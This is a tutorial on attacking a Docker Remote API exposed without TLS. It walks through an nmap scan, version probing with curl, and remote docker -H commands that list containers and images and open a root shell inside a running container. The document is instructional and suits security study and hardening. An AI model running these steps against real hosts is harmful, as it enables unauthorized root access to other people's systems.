====== Docker - Attack Docker exposed API ======
If you have enabled the Docker Remote API (see Enable Docker Remote API) and exposed it on a TCP port without TLS client authentication, anyone who can reach that port can drive the daemon, which itself runs as root on the host. The steps below show what such an attacker sees.
===== Information Gathering & Enumeration =====
Do a port scan of all 65535 TCP ports (-p-), since the API can be bound to any port:
<code bash>
sudo nmap -sS -T5 192.168.1.118 -p-

Starting Nmap 7.01 ( https://nmap.org ) at 2017-04-11 12:37 CEST
Nmap scan report for 192.168.1.118
Host is up (0.00076s latency).
Not shown: 65498 closed ports, 35 filtered ports
PORT     STATE SERVICE
22/tcp   open  ssh
1234/tcp open  docker
MAC Address: 0C:01:67:8A:63:F2 (Oracle VirtualBox virtual NIC)
</code>
I had to scan more ports than the default top 1000 because the Docker API port is not included :( OK then, what about service detection?
<code bash>
nmap -sTV -p 1234 192.168.1.118

Starting Nmap 7.01 ( https://nmap.org ) at 2017-04-11 12:43 CEST
Nmap scan report for 192.168.1.118
Host is up (0.00038s latency).
PORT     STATE SERVICE VERSION
1234/tcp open  18.06.0-ce Docker
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.65 seconds
</code>
This confirms that we are dealing with Docker.
nmap also reports the exact Docker version. To confirm it manually, send a GET request to the /version endpoint at http://<IP>:1234/version (the python -m json.tool pipe only pretty-prints the JSON answer). A 200 response carrying a JSON document with Version and ApiVersion fields is the tell; a daemon that is protected by TLS will not answer plain HTTP at all.
<code bash>
curl -s http://192.168.1.118:1234/version | python -m json.tool
</code>
NOTE: Claudio Criscione wrote an nmap script to do this (see his GitHub page).
----
===== Test the exposed API using the docker CLI =====
The -H flag points the local docker CLI at the remote daemon instead of the local socket. Nothing on the daemon side asks who you are, so every command below runs with the daemon's privileges:
<code bash>
docker -H 192.168.1.118:1234 info
</code>
----
==== Gather Information ====
Are there any containers running?
<code bash>
docker -H 192.168.1.118:1234 ps
</code>
----
Are there any stopped containers?
<code bash>
docker -H 192.168.1.118:1234 ps -a
</code>
Which images are pulled on the host machine?
<code bash>
docker -H 192.168.1.118:1234 images
</code>
----
===== Accessing the container =====
Spawn a bash shell inside a running container (docker exec only works against running containers, so pick one from the ps output above; if the image ships no bash, fall back to /bin/sh):
<code bash>
docker -H 192.168.1.118:1234 exec -it <container name> /bin/bash
</code>
Check which user you are:
<code bash>
whoami && id
root
uid=0(root) gid=0(root) groups=0(root)
</code>
NOTE: Already root!!!
Unless the image sets a USER, processes inside a container run as root by default. Strictly this is root inside the container's namespaces rather than on the host, but with control of the daemon that distinction buys the host little: the attacker is not limited to the containers that already exist and can start new ones with whatever options they like.
Once inside a container you can start digging for useful information.